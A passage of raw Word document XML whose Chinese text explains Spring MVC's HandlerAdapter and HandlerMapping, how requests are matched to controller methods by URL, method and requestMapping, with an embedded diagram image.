      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>再根据请求去定位请求的具体处理方法是哪一个。</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00002CAB" w:rsidRDefault="00002CAB" w:rsidP="00002CAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>返回处理请求的</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实例后，需要一个帮助定位具体请求方法的处理类，这个类就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是处理器适配器，</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来实际调用处理函数。例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>自动注册的</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AnnotationMethodHandlerAdpater</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>定义了如何处理请求的策略，</w:t>
      </w:r>
      <w:r w:rsidRPr="006247A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过请求</w:t>
      </w:r>
      <w:r w:rsidRPr="006247A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="006247A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、请求</w:t>
      </w:r>
      <w:r w:rsidRPr="006247A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
      <w:r w:rsidRPr="006247A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和处理器的</w:t>
      </w:r>
      <w:r w:rsidRPr="006247A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>requestMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="006247A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，最终确定使用处理类的哪个方法来处理请求，并检查处理类相应处理方法的参数以及相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>配置，确定如何转换需要的参数传入调用方法，并最终调用返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00002CAB" w:rsidRPr="00002CAB" w:rsidRDefault="00002CAB" w:rsidP="00493BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A1FCF" w:rsidRPr="00226472" w:rsidRDefault="003A1FCF" w:rsidP="003A1FCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>什么是</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A5B07" w:rsidRDefault="003A1FCF" w:rsidP="00493BE8">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>处理器映射（</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>handler mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450AA9" w:rsidRPr="00F41A4C" w:rsidRDefault="003A1FCF" w:rsidP="006A5B07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过处理器映射，你可以将</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>请求映射到正确的处理器</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(handler)</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上。</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内置了很多处理器映射策略</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E36144">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2. HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是把一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指定到一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上就像应用系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>web.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;servlet-mapping&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>映射到</w:t>
      </w:r>
      <w:r w:rsidRPr="00226472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>servlet</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5314950" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://images.cnitblog.com/i/270324/201402/2811064305979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ages.cnitblog.com/i/270324/201402/281106430597942.jpg"/>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5314950" cy="3162300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450AA9" w:rsidRPr="00F41A4C" w:rsidRDefault="00450AA9" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA5126" w:rsidRDefault="00DA5126" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B57008" w:rsidRPr="007C427D" w:rsidRDefault="00B57008" w:rsidP="00D333FF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:kern w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C427D">
        <w:rPr>
